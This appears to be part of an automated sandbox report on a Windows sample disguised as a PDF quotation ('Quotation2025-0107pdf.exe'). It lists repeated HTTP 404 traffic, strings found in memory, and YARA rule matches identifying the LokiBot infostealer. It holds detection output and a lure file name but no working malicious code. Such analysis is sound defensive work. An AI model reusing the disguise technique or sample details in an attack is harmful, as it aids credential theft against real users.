Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:33:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:34:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Tue, 07 Jan 2025 11:34:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: Quotation2025-0107pdf.exe, mexnJkivovwH.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Quotation2025-0107pdf.exe, mexnJkivovwH.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: Quotation2025-0107pdf.exe, mexnJkivovwH.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1713091318.00000000035D8000.00000004.00000800.00020000.00000000.sdmp, mexnJkivovwH.exe, 00000009.00000002.1749098659.0000000002449000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: mexnJkivovwH.exe, mexnJkivovwH.exe, 0000000D.00000002.1742337265.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Quotation2025-0107pdf.exe, 00000000.00000002.1720907874.0000000009A62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: Quotation2025-0107pdf.exe, mexnJkivovwH.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 9.2.mexnJkivovwH.exe.3ebf078.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 9.2.mexnJkivovwH.exe.3ebf078.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 9.2.mexnJkivovwH.exe.3ebf078.2.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.2.mexnJkivovwH.exe.3ebf078.2.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.mexnJkivovwH.exe.3c45590.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 9.2.mexnJkivovwH.exe.3c45590.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 9.2.mexnJkivovwH.exe.3c45590.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.2.mexnJkivovwH.exe.3c45590.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.mexnJkivovwH.exe.3c45590.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.mexnJkivovwH.exe.3ebf078.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.mexnJkivovwH.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Quotation2025-0107pdf.exe.4db46e8.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.mexnJkivovwH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
